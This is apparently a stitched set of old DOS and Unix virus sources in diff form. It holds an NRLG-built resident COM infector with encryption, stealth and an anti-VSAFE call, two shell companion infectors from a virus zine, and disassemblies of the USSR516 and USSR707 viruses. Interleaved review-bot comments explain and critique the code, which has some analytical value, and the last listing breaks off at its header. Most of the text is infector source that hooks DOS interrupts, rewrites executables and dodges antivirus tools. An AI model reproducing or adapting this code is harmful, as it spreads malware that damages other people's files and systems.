JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall ANTI_V
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
xor word ptr [di],06acdh
not byte ptr [di]
add word ptr [di],04a83h
xor word ptr [di],0c3d7h
dec word ptr [di]
dec byte ptr [di]
not word ptr [di]
sub word ptr [di],0aa17h
xor word ptr [di],0e185h
add byte ptr [di],0b9h
xor byte ptr [di],061h
sub byte ptr [di],075h
xor byte ptr [di],030h
dec word ptr [di]
xor byte ptr [di],022h
dec word ptr [di]
add byte ptr [di],087h
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov cx,50 ;50 beep's!
beep: ;beep label!
mov ax,0E07h ;
int 10h ;print beep char
loop beep ;go!
NO_DAY: ;
ret ;
;---------------------------------
ÿ;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------
ÿ;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
action_dia Db 01fH ;day for the action
action_mes Db 0cH ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start

@ -0,0 +1,63 @@
Lame Unix Viruses
+---------------+
Well, you might have read the title to this article and thought, well
if the damn thing is lame.. why the fuck is it in vlad#4 ?! This can
be answered quite simply, we had one free space! :) It was a bit of
a dilemma to begin with, we had four articles and one space. The problem
was they were all kinda lame. So it was a lame pick of the month episode.
Out of the four articles this was the leastest lamest. Well actually
I don't know about that, but anyway it was the most different one we
had sitting there. Just to prove the title, the author of these
masterpieces asked to remain anonymous to save his reputation.
These "viruses" are the equivalent of a DOS batch file infector because
they are written in shell language. They function similarly to companion
infectors by renaming the original file and replacing it with themselves.
Disinfection is simple by 'mv'ing (moving) the original files back.
Anyway, perhaps someone is interested so here they are. There isn't
much use for them except to annoy your friends when it messes up all
the files in their directory.
+-----------------------------------+
#!/bin/sh
# Dumb Unix Virus
# I dont wanna write anutha dumb unix virus qark, i wont
# Due to excess lameness, dont distribute
# <Author's name withheld for obvious reasons>
for files in *
do
if [ -x files ]
then
if [ ! -d files ]
then
mv files files.EVILVIRUS.HELPME
cp $0 files
chmod +x files
files.EVILVIRUS.HELPME
fi
fi
+-----------------------------------+
cat << _EOF >unix.virus
#!/bin/csh
# Dumber Unix Virus
# by
# SumUtherGuy
foreach i (*)
mv $i bak.$i
cp $0 $i
i >> $i
end
_EOF
+-----------------------------------+
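Review bot: The first script is inert as listed: inside the `for files in *` loop every test and command names the literal string `files` rather than the loop variable, and the loop has no closing `done`, so `sh` would reject it before running anything. An archival comment above it, e.g. `# Note: as printed this script does not execute (loop never closed, loop variable never expanded)`, would stop anyone cataloguing the sample from recording it as a working companion infector. The second listing is a heredoc that merely writes out `unix.virus`, and its `i >> $i` line runs a command named `i` with redirected output rather than appending the file to itself, so the described behaviour is only partly present there too.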

@ -0,0 +1,278 @@
ussr516 segment byte public
assume cs:ussr516, ds:ussr516
org 100h
; Disassembled by Dark Angel of PHALCON/SKISM
; for 40Hex Number 7 Volume 2 Issue 3
stub: db 0e9h, 0, 0
db 0e9h, 1, 0, 0
; This is where the virus really begins
start:
push ax
call beginvir
orig4 db 0cdh, 20h, 0, 0
int30store db 0, 0, 0, 0 ; Actually it's int 21h
; entry point
int21store db 0, 0, 0, 0
beginvir: pop bp ; BP -> orig4
mov si,bp
mov di,103h
add di,[di-2] ; DI -> orig4
movsw ; restore original
movsw ; 4 bytes of program
xor si,si
mov ds,si
les di,dword ptr ds:[21h*4]
mov [bp+8],di ; int21store
mov [bp+0Ah],es
lds di,dword ptr ds:[30h*4+1] ; Bug????
findmarker:
inc di
cmp word ptr [di-2],0E18Ah ; Find marker bytes
jne findmarker ; to the entry point
mov [bp+4],di ; and move to
mov [bp+6],ds ; int30store
mov ax,5252h ; Get list of lists
int 21h ; and also ID check
add bx,12h ; Already installed?
jz quitvir ; then exit
push bx
mov ah,30h ; Get DOS version
int 21h
pop bx ; bx = 12, ptr to 1st
; disk buffer
cmp al,3
je handlebuffer ; if DOS 3
ja handleDBHCH ; if > DOS 3
inc bx ; DOS 2.X, offset is 13
handlebuffer:
push ds
push bx
lds bx,dword ptr [bx] ; Get seg:off of buffer
inc si
pop di
pop es ; ES:DI->seg:off buff
mov ax,[bx] ; ptr to next buffer
cmp ax,0FFFFh ; least recently used?
jne handlebuffer ; if not, go find it
cmp si,3
jbe quitvir
stosw
stosw
jmp short movetobuffer
handleDBHCH: ; Disk Buffer Hash Chain Head array
lds si,dword ptr [bx] ; ptr to disk buffer
lodsw ; info
lodsw ; seg of disk buffer
; hash chain head array
inc ax ; second entry
mov ds,ax
xor bx,bx
mov si,bx
lodsw ; EMS page, -1 if not
; in EMS
xchg ax,di ; save in di
lodsw ; ptr to least recently
; used buffer
mov [di+2],ax ; change disk buffer
; backward offset to
; least recently used
xchg ax,di ; restore EMS page
mov [di],ax ; set to least recently
movetobuffer: ; used
mov di,bx
push ds
pop es ; ES:DI -> disk buffer
push cs
pop ds
mov cx,108h
lea si,[bp-4] ; Copy from start
rep movsw
mov ds,cx ; DS -> interrupt table
mov word ptr ds:[4*21h],0BCh ; New interrupt handler
mov word ptr ds:[4*21h+2],es ; at int21
quitvir:
push cs ; CS = DS = ES
pop es
push es
pop ds
pop ax
mov bx,ax
mov si, 100h ; set up stack for
push si ; the return to the
retn ; original program
int24:
mov al,3 ; Ignore all errors
iret
tickstore db 3 ; Why???
buffer db 3, 0, 9, 0
int21:
pushf
cli ; CP/M style call entry
call dword ptr cs:[int30store-start]
retn ; point of int 21h
int21DSDX: ; For int 21h calls
push ds ; with
lds dx,dword ptr [bp+2] ; DS:DX -> filename
call int21
pop ds
retn
cmp ax,4B00h ; Execute
je Execute
cmp ax,5252h ; ID check
je CheckID
cmp ah,30h ; DOS Version
je DosVersion
callorig21: ; Do other calls
jmp dword ptr cs:[int21store-start]
DosVersion: ; Why????? ; DOS Version
dec byte ptr cs:[tickstore-start]
jnz callorig21 ; Continue if not 0
push es
xor ax,ax
push ax
mov es,ax
mov al,es:[46Ch] ; 40h:6Ch = Timer ticks
; since midnight
and al,7 ; MOD 15
inc ax
inc ax
mov cs:[tickstore-start],al ; # 2-17
pop ax
pop es
iret
CheckID: ; ID Check
mov bx,0FFEEh ; FFEEh = -12h
iret
Execute: ; Execute
push ax ; Save registers
push cx
push es
push bx
push ds ; DS:DX -> filename
push dx ; save it on stack
push bp
mov bp,sp ; Set up stack frame
sub sp,0Ah ; Temporary variables
; [bp-A] = attributes
; [bp-8] = int 24 off
; [bp-6] = int 24 seg
; [bp-4] = file time
; [bp-2] = file date
sti
push cs
pop ds
mov ax,3301h ; Turn off ^C check
xor dl,dl ; (never turn it back
call int21 ; on. Bug???)
mov ax,3524h ; Get int 24h
call int21 ; (Critical error)
mov [bp-8],bx
mov [bp-6],es
mov dx,int24-start
mov ax,2524h ; Set to new one
call int21
mov ax,4300h ; Get attributes
call int21DSDX
jnc continue
doneinfect:
mov ax,2524h ; Restore crit error
lds dx,dword ptr [bp-8] ; handler
call int21
cli
mov sp,bp
pop bp
pop dx
pop ds
pop bx
pop es
pop cx
pop ax
jmp short callorig21 ; Call orig handler
continue:
mov [bp-0Ah],cx ; Save attributes
test cl,1 ; Check if r/o????
jz noclearattr
xor cx,cx
mov ax,4301h ; Clear attributes
call int21DSDX ; Filename in DS:DX
jc doneinfect ; Quit on error
noclearattr:
mov ax,3D02h ; Open read/write
call int21DSDX ; Filename in DS:DX
jc doneinfect ; Exit if error
mov bx,ax
mov ax,5700h ; Save time/date
call int21
mov [bp-4],cx
mov [bp-2],dx
mov dx,buffer-start
mov cx,4
mov ah,3Fh ; Read 4 bytes to
call int21 ; buffer
jc quitinf
cmp byte ptr ds:[buffer-start],0E9h; Must start with 0E9h
jne quitinf ; Otherwise, quit
mov dx,word ptr ds:[buffer+1-start]; dx = jmploc
dec dx
xor cx,cx
mov ax,4201h ; go there
call int21
mov ds:[buffer-start],ax ; new location offset
mov dx,orig4-start
mov cx,4
mov ah,3Fh ; Read 4 bytes there
call int21
mov dx,ds:[orig4-start]
cmp dl,0E9h ; 0E9h means we might
jne infect ; already be there
mov ax,ds:[orig4+2-start] ; continue checking
add al,dh ; to see if we really
sub al,ah ; are there.
jz quitinf
infect:
xor cx,cx
mov dx,cx
mov ax,4202h ; Go to EOF
call int21
mov ds:[buffer+2-start],ax ; save filesize
mov cx,204h
mov ah,40h ; Write virus
call int21
jc quitinf ; Exit if error
sub cx,ax
jnz quitinf
mov dx,ds:[buffer-start]
mov ax,ds:[buffer+2-start]
sub ax,dx
sub ax,3 ; AX->jmp offset
mov word ptr ds:[buffer+1-start],ax; Set up buffer
mov byte ptr ds:[buffer-start],0E9h; code the jmp
add al,ah
mov byte ptr ds:[buffer+3-start],al
mov ax,4200h ; Rewind to jmploc
call int21
mov dx, buffer-start
mov cx,4 ; Write in the jmp
mov ah,40h
call int21
quitinf:
mov cx,[bp-4]
mov dx,[bp-2]
mov ax,5701h ; Restore date/time
call int21
mov ah,3Eh ; Close file
call int21
mov cx,[bp-0Ah] ; Restore attributes
mov ax,4301h
call int21DSDX
jmp doneinfect ; Return
ussr516 ends
end stub
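Review bot: The comments in DosVersion misstate the arithmetic: `and al,7` keeps the low three bits (a value 0–7, i.e. modulo 8), not "MOD 15", and after the two `inc ax` the stored tick count lies in 2–9, not "# 2-17"; the two comments should read `; MOD 8` and `; # 2-9`. The "Bug????" on `lds di,dword ptr ds:[30h*4+1]` also looks unwarranted rather than a defect: 0:C0h holds the far JMP that the int21 routine below calls the CP/M-style call entry, so reading the dword at 0:C1h skips the 0EAh opcode and picks up its seg:off, which findmarker then walks forward from — a comment saying so would serve an analyst better than the question marks. For detection purposes the header should also record the in-memory signature the code makes visible: int 21h with AX=5252h returns BX=0FFEEh once the handler is installed, and the handler is copied into a DOS disk buffer and vectored at offset 0BCh there rather than living in allocated memory.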

@ -0,0 +1,408 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ USSR707 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 9-Feb-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 20h
data_2e equ 22h
data_3e equ 4Ch
data_4e equ 4Eh
data_5e equ 84h
data_6e equ 86h
data_7e equ 413h
data_8e equ 1460h
data_9e equ 3
data_10e equ 2
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
ussr707 proc far
start:
mov ax,offset loc_2
push ax
retn
loc_2:
jmp short loc_3
nop
ussr707 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_2 proc near
call sub_3
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_3:
pop di
sub di,6
retn
sub_2 endp
db 60h, 14h, 2Bh, 02h, 2Eh, 3Ah
db 26h,0FFh, 0Dh, 00h,0A0h, 00h
db 50h,0C3h, 01h, 2Eh,0A3h,0C0h
db 00h, 9Ch, 00h, 00h, 90h, 90h
db 90h,0CDh
db 20h
loc_3:
call sub_2
mov ah,[di+21h]
mov byte ptr ds:[100h],ah
mov ax,[di+22h]
mov word ptr ds:[101h],ax
mov ax,[di+24h]
mov word ptr ds:[103h],ax
mov ah,30h ; '0'
int 21h ; DOS Services ah=function 30h
; get DOS version number ax
cmp ax,1E03h
je loc_4 ; Jump if equal
jmp loc_9
loc_4:
mov bl,0
mov ax,4BFFh
int 21h ; ??INT Non-standard interrupt
cmp bl,0FFh
jne loc_5 ; Jump if not equal
jmp loc_9
loc_5:
mov ax,ds:data_10e
mov [di+14h],ax
mov bx,di
add bx,0Fh
xor ax,ax ; Zero register
mov es,ax
loc_6:
xor si,si ; Zero register
mov ax,es
inc ax
cmp ax,0FFFh
jbe loc_7 ; Jump if below or =
jmp short loc_9
nop
loc_7:
mov es,ax
loc_8:
mov ah,es:data_8e[si]
cmp ah,[bx+si]
jne loc_6 ; Jump if not equal
inc si
cmp si,5
jne loc_8 ; Jump if not equal
mov [di+0Dh],es
mov word ptr [di+1Fh],0
mov ax,cs
dec ax
mov es,ax
call sub_7
sub si,di
mov ax,si
mov cl,4
shr ax,cl ; Shift w/zeros fill
inc ax
sub es:data_9e,ax
sub ds:data_10e,ax
mov bx,[di+14h]
sub bx,ax
mov es,bx
push di
call sub_4
xor cx,cx ; Zero register
mov ds,cx
mov cl,6
shr ax,cl ; Shift w/zeros fill
inc ax
sub ds:data_7e,ax
mov ax,ds:data_5e
mov cs:[bx+0Bh],ax
mov ax,ds:data_6e
mov cs:[bx+0Dh],ax
push cs
pop ds
mov cx,si
mov si,di
xor di,di ; Zero register
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop di
sub bx,di
add bx,2
xor ax,ax ; Zero register
mov ds,ax
cli ; Disable interrupts
mov ds:data_5e,bx
mov ds:data_6e,es
sti ; Enable interrupts
loc_9:
push cs
pop ds
push cs
pop es
mov ax,offset start
push ax
retn
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_4 proc near
call sub_5
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_5:
pop bx
retn
sub_4 endp
push bx
mov bh,4Bh ; 'K'
cmp bh,ah
je loc_11 ; Jump if equal
pop bx
loc_10:
;* jmp far ptr loc_1
db 0EAh, 93h, 17h, 26h, 0Dh
loc_11:
cmp al,0FFh
jne loc_12 ; Jump if not equal
pop bx
mov bl,0FFh
iret ; Interrupt return
pushf ; Push flags
;* call far ptr sub_1
db 9Ah, 00h, 00h, 00h, 00h
push ax
in al,61h ; port 61h, 8255 port B, read
xor al,3
out 61h,al ; port 61h, 8255 B - spkr, etc
mov al,0B6h
out 43h,al ; port 43h, 8253 wrt timr mode
mov ax,bx
out 42h,al ; port 42h, 8253 timer 2 spkr
mov al,ah
out 42h,al ; port 42h, 8253 timer 2 spkr
pop ax
iret ; Interrupt return
loc_12:
push ax
push cx
push dx
push di
push ds
push es
mov bx,dx
xor di,di ; Zero register
loc_13:
inc di
cmp byte ptr [bx+di],0
jne loc_13 ; Jump if not equal
cmp word ptr [bx+di-2],4D4Fh
je loc_14 ; Jump if equal
jmp loc_26
loc_14:
cmp byte ptr [bx+di-3],43h ; 'C'
je loc_15 ; Jump if equal
jmp loc_26
loc_15:
call sub_2
mov bx,di
add bx,1Ah
mov ax,70h
mov es,ax
xor di,di ; Zero register
loc_16:
inc di
cmp di,0FFFFh
jbe loc_17 ; Jump if below or =
jmp loc_26
loc_17:
xor si,si ; Zero register
loc_18:
mov ah,es:[di]
cmp ah,cs:[bx+si]
jne loc_16 ; Jump if not equal
inc si
inc di
cmp si,5
jne loc_18 ; Jump if not equal
sub di,5
xor ax,ax ; Zero register
mov es,ax
push word ptr es:data_3e
push word ptr es:data_4e
cli ; Disable interrupts
mov es:data_3e,di
mov word ptr es:data_4e,70h
sti ; Enable interrupts
call sub_2
mov bx,dx
xor cx,cx ; Zero register
mov ah,4Eh ; 'N'
call sub_6
jnc loc_19 ; Jump if carry=0
jmp loc_25
loc_19:
mov ah,2Fh ; '/'
call sub_6
mov ax,es:[bx+1Ah]
cmp ax,0F000h
jbe loc_20 ; Jump if below or =
jmp loc_25
loc_20:
push ds
push dx
push word ptr es:[bx+15h]
push word ptr es:[bx+16h]
push word ptr es:[bx+18h]
add ax,100h
mov cs:[di+18h],ax
mov ax,4301h
mov cx,20h
call sub_6
mov ax,3D02h
call sub_6
jnc loc_21 ; Jump if carry=0
jmp short loc_24
nop
loc_21:
push cs
pop ds
mov bx,ax
mov ah,3Fh ; '?'
mov cx,5
mov dx,di
add dx,21h
call sub_6
mov ax,[di+18h]
sub ax,[di+22h]
cmp ax,2C3h
jne loc_23 ; Jump if not equal
cmp byte ptr [di+20h],1Eh
jae loc_22 ; Jump if above or =
inc byte ptr [di+20h]
loc_22:
jmp short loc_24
nop
loc_23:
mov byte ptr [di+17h],0B8h
mov ax,4200h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_6
mov ah,40h ; '@'
mov cx,3
mov dx,di
add dx,17h
call sub_6
mov ah,40h ; '@'
mov cx,2
mov word ptr [di+17h],0C350h
call sub_6
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_6
mov ah,40h ; '@'
call sub_7
mov cx,si
sub cx,di
mov dx,di
call sub_6
loc_24:
mov ax,5701h
pop dx
pop cx
call sub_6
mov ax,4301h
pop cx
mov ch,0
pop dx
pop ds
call sub_6
mov ah,3Eh ; '>'
call sub_6
loc_25:
xor ax,ax ; Zero register
mov es,ax
cli ; Disable interrupts
pop word ptr es:data_4e
pop word ptr es:data_3e
sti ; Enable interrupts
loc_26:
call sub_2
cmp byte ptr cs:[di+1Fh],0
jne loc_27 ; Jump if not equal
cmp byte ptr cs:[di+20h],1Eh
jb loc_27 ; Jump if below
mov byte ptr cs:[di+1Fh],1
xor ax,ax ; Zero register
mov es,ax
call sub_4
add bx,17h
mov ax,es:data_1e
mov cx,es:data_2e
mov cs:[bx+2],ax
mov cs:[bx+4],cx
cli ; Disable interrupts
mov es:data_1e,bx
mov es:data_2e,cs
sti ; Enable interrupts
loc_27:
pop es
pop ds
pop di
pop dx
pop cx
pop ax
pop bx
jmp loc_10
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_6 proc near
pushf ; Push flags
call dword ptr cs:[di+0Bh]
retn
sub_6 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_7 proc near
call sub_8
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_8:
pop si
add si,5
retn
sub_7 endp
seg_a ends
end start
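Review bot: The listing carries no description beyond the Sourcer banner, and the raw `db` runs after sub_2 and at loc_10/loc_11 hide the far transfers an analyst most needs, so a short comment block above `start` stating what the visible code establishes is the missing piece. Readable directly: execution continues past loc_4 only when AH=30h returns AX=1E03h, which is DOS 3.30 (AL=major, AH=minor), so resident installation is version-gated; AX=4BFFh with BL=0 is the already-resident probe, answered with BL=0FFh in the handler; and the handler acts only on names ending in 'COM' (the 4D4Fh and 43h checks after loc_13). The scan at loc_6–loc_8 walks every segment up to 0FFFh for a 5-byte pattern, and the vector writes at 0:84h/86h (int 21h), 0:4Ch/4Eh (int 13h, repointed at an address found by scanning segment 70h) and 0:20h/22h (int 8, for the speaker payload) are the behaviour a resident-code detector would key on. Suggested header: `; Resident COM infector; installs only on DOS 3.30 (AX=1E03h); resident check AX=4BFFh -> BL=0FFh; hooks int 21h, int 13h and int 8`.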

@ -0,0 +1,384 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ USSR711 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 9-Feb-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ ÛÛ
